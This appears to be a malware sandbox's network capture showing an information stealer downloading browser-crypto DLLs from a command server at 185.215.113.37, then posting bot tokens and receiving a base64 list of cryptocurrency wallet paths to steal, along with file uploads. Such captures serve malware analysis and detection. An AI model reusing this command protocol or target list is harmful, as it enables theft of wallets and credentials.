Oct 1, 2024 19:32:13.262932062 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 1, 2024 19:32:13.580457926 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 19:32:13.798086882 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 1, 2024 19:32:15.560805082 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 19:32:15.777399063 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 1, 2024 19:32:16.056344032 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 19:32:16.275098085 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 1, 2024 19:32:16.682002068 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJ Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 19:32:17.590166092 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 19:32:17.696193933 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHI Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 2d 2d 0d 0a Data Ascii: ------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="message"wallets------KJECFHCBKKEBAKFIJDHI--
Oct 1, 2024 19:32:17.915455103 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:17 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 1, 2024 19:32:17.921426058 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAE Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 2d 2d 0d 0a Data Ascii: ------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="message"files------FHIDBKFCAAEBFIDHDBAE--
Oct 1, 2024 19:32:18.254626036 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAE Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 2d 2d 0d 0a Data Ascii: ------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="message"files------FHIDBKFCAAEBFIDHDBAE--
Oct 1, 2024 19:32:18.897579908 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAE Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 2d 2d 0d 0a Data Ascii: ------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="message"files------FHIDBKFCAAEBFIDHDBAE--
Oct 1, 2024 19:32:18.977693081 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:17 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 1, 2024 19:32:18.979645967 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:17 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 1, 2024 19:32:19.201478958 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 19:32:19.216989994 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJDAEGCAFIIDGDGCGIJ Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 41 45 47 43 41 46 49 49 44 47 44 47 43 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 41 45 47 43 41 46 49 49 44 47 44 47 43 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 41 45 47 43 41 46 49 49 44 47 44 47 43 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 